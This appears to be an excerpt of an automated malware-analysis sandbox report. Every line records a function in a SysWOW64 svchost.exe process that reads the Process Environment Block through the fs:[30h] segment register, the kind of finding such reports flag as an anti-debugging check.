                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 4_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FDE3DB mov ecx, dword ptr fs:[00000030h] 4_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 4_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FEC3CD mov eax, dword ptr fs:[00000030h] 4_2_02FEC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F383C0 mov eax, dword ptr fs:[00000030h] 4_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0300625D mov eax, dword ptr fs:[00000030h] 4_2_0300625D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F28397 mov eax, dword ptr fs:[00000030h] 4_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F2E388 mov eax, dword ptr fs:[00000030h] 4_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F5438F mov eax, dword ptr fs:[00000030h] 4_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FD437C mov eax, dword ptr fs:[00000030h] 4_2_02FD437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB035C mov eax, dword ptr fs:[00000030h] 4_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB035C mov ecx, dword ptr fs:[00000030h] 4_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFA352 mov eax, dword ptr fs:[00000030h] 4_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FD8350 mov ecx, dword ptr fs:[00000030h] 4_2_02FD8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h] 4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB2349 mov eax, dword ptr fs:[00000030h]4_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030062D6 mov eax, dword ptr fs:[00000030h]4_2_030062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C310 mov ecx, dword ptr fs:[00000030h]4_2_02F2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F50310 mov ecx, dword ptr fs:[00000030h]4_2_02F50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A30B mov eax, dword ptr fs:[00000030h]4_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A30B mov eax, dword ptr fs:[00000030h]4_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A30B mov eax, dword ptr fs:[00000030h]4_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]4_2_02F2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F720F0 mov ecx, dword ptr fs:[00000030h]4_2_02F720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]4_2_02F2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F380E9 mov eax, dword ptr fs:[00000030h]4_2_02F380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB60E0 mov eax, dword ptr fs:[00000030h]4_2_02FB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB20DE mov eax, dword ptr fs:[00000030h]4_2_02FB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF60B8 mov eax, dword ptr fs:[00000030h]4_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]4_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F280A0 mov eax, dword ptr fs:[00000030h]4_2_02F280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC80A8 mov eax, dword ptr fs:[00000030h]4_2_02FC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004164 mov eax, dword ptr fs:[00000030h]4_2_03004164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004164 mov eax, dword ptr fs:[00000030h]4_2_03004164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3208A mov eax, dword ptr fs:[00000030h]4_2_02F3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5C073 mov eax, dword ptr fs:[00000030h]4_2_02F5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F32050 mov eax, dword ptr fs:[00000030h]4_2_02F32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6050 mov eax, dword ptr fs:[00000030h]4_2_02FB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC6030 mov eax, dword ptr fs:[00000030h]4_2_02FC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A020 mov eax, dword ptr fs:[00000030h]4_2_02F2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C020 mov eax, dword ptr fs:[00000030h]4_2_02F2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E016 mov eax, dword ptr fs:[00000030h]4_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E016 mov eax, dword ptr fs:[00000030h]4_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E016 mov eax, dword ptr fs:[00000030h]4_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E016 mov eax, dword ptr fs:[00000030h]4_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030061E5 mov eax, dword ptr fs:[00000030h]4_2_030061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB4000 mov ecx, dword ptr fs:[00000030h]4_2_02FB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD2000 mov eax, dword ptr fs:[00000030h]4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F601F8 mov eax, dword ptr fs:[00000030h]4_2_02F601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]4_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF61C3 mov eax, dword ptr fs:[00000030h]4_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF61C3 mov eax, dword ptr fs:[00000030h]4_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB019F mov eax, dword ptr fs:[00000030h]4_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB019F mov eax, dword ptr fs:[00000030h]4_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB019F mov eax, dword ptr fs:[00000030h]4_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB019F mov eax, dword ptr fs:[00000030h]4_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A197 mov eax, dword ptr fs:[00000030h]4_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A197 mov eax, dword ptr fs:[00000030h]4_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A197 mov eax, dword ptr fs:[00000030h]4_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F70185 mov eax, dword ptr fs:[00000030h]4_2_02F70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEC188 mov eax, dword ptr fs:[00000030h]4_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEC188 mov eax, dword ptr fs:[00000030h]4_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD4180 mov eax, dword ptr fs:[00000030h]4_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD4180 mov eax, dword ptr fs:[00000030h]4_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C156 mov eax, dword ptr fs:[00000030h]4_2_02F2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC8158 mov eax, dword ptr fs:[00000030h]4_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36154 mov eax, dword ptr fs:[00000030h]4_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36154 mov eax, dword ptr fs:[00000030h]4_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov eax, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov eax, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov ecx, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov eax, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC4144 mov eax, dword ptr fs:[00000030h]4_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F60124 mov eax, dword ptr fs:[00000030h]4_2_02F60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA118 mov ecx, dword ptr fs:[00000030h]4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA118 mov eax, dword ptr fs:[00000030h]4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA118 mov eax, dword ptr fs:[00000030h]4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA118 mov eax, dword ptr fs:[00000030h]4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF0115 mov eax, dword ptr fs:[00000030h]4_2_02FF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov ecx, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov ecx, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov ecx, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov eax, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE10E mov ecx, dword ptr fs:[00000030h]4_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]4_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]4_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]4_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]4_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB06F1 mov eax, dword ptr fs:[00000030h]4_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB06F1 mov eax, dword ptr fs:[00000030h]4_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]4_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]4_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F666B0 mov eax, dword ptr fs:[00000030h]4_2_02F666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]4_2_02F6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34690 mov eax, dword ptr fs:[00000030h]4_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34690 mov eax, dword ptr fs:[00000030h]4_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F62674 mov eax, dword ptr fs:[00000030h]4_2_02F62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF866E mov eax, dword ptr fs:[00000030h]4_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF866E mov eax, dword ptr fs:[00000030h]4_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A660 mov eax, dword ptr fs:[00000030h]4_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A660 mov eax, dword ptr fs:[00000030h]4_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4C640 mov eax, dword ptr fs:[00000030h]4_2_02F4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E627 mov eax, dword ptr fs:[00000030h]4_2_02F4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F66620 mov eax, dword ptr fs:[00000030h]4_2_02F66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68620 mov eax, dword ptr fs:[00000030h]4_2_02F68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3262C mov eax, dword ptr fs:[00000030h]4_2_02F3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72619 mov eax, dword ptr fs:[00000030h]4_2_02F72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAE609 mov eax, dword ptr fs:[00000030h]4_2_02FAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4260B mov eax, dword ptr fs:[00000030h]4_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F347FB mov eax, dword ptr fs:[00000030h]4_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F347FB mov eax, dword ptr fs:[00000030h]4_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F527ED mov eax, dword ptr fs:[00000030h]4_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F527ED mov eax, dword ptr fs:[00000030h]4_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F527ED mov eax, dword ptr fs:[00000030h]4_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]4_2_02FBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]4_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB07C3 mov eax, dword ptr fs:[00000030h]4_2_02FB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F307AF mov eax, dword ptr fs:[00000030h]4_2_02F307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE47A0 mov eax, dword ptr fs:[00000030h]4_2_02FE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD678E mov eax, dword ptr fs:[00000030h]4_2_02FD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38770 mov eax, dword ptr fs:[00000030h]4_2_02F38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40770 mov eax, dword ptr fs:[00000030h]4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30750 mov eax, dword ptr fs:[00000030h]4_2_02F30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBE75D mov eax, dword ptr fs:[00000030h]4_2_02FBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72750 mov eax, dword ptr fs:[00000030h]4_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72750 mov eax, dword ptr fs:[00000030h]4_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB4755 mov eax, dword ptr fs:[00000030h]4_2_02FB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6674D mov esi, dword ptr fs:[00000030h]4_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6674D mov eax, dword ptr fs:[00000030h]4_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6674D mov eax, dword ptr fs:[00000030h]4_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6273C mov eax, dword ptr fs:[00000030h]4_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6273C mov ecx, dword ptr fs:[00000030h]4_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6273C mov eax, dword ptr fs:[00000030h]4_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAC730 mov eax, dword ptr fs:[00000030h]4_2_02FAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C720 mov eax, dword ptr fs:[00000030h]4_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C720 mov eax, dword ptr fs:[00000030h]4_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30710 mov eax, dword ptr fs:[00000030h]4_2_02F30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F60710 mov eax, dword ptr fs:[00000030h]4_2_02F60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C700 mov eax, dword ptr fs:[00000030h]4_2_02F6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004500 mov eax, dword ptr fs:[00000030h]4_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F304E5 mov ecx, dword ptr fs:[00000030h]4_2_02F304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F644B0 mov ecx, dword ptr fs:[00000030h]4_2_02F644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]4_2_02FBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F364AB mov eax, dword ptr fs:[00000030h]4_2_02F364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEA49A mov eax, dword ptr fs:[00000030h]4_2_02FEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5A470 mov eax, dword ptr fs:[00000030h]4_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5A470 mov eax, dword ptr fs:[00000030h]4_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5A470 mov eax, dword ptr fs:[00000030h]4_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBC460 mov ecx, dword ptr fs:[00000030h]4_2_02FBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEA456 mov eax, dword ptr fs:[00000030h]4_2_02FEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2645D mov eax, dword ptr fs:[00000030h]4_2_02F2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5245A mov eax, dword ptr fs:[00000030h]4_2_02F5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A430 mov eax, dword ptr fs:[00000030h]4_2_02F6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E420 mov eax, dword ptr fs:[00000030h]4_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E420 mov eax, dword ptr fs:[00000030h]4_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E420 mov eax, dword ptr fs:[00000030h]4_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C427 mov eax, dword ptr fs:[00000030h]4_2_02F2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68402 mov eax, dword ptr fs:[00000030h]4_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68402 mov eax, dword ptr fs:[00000030h]4_2_02F68402
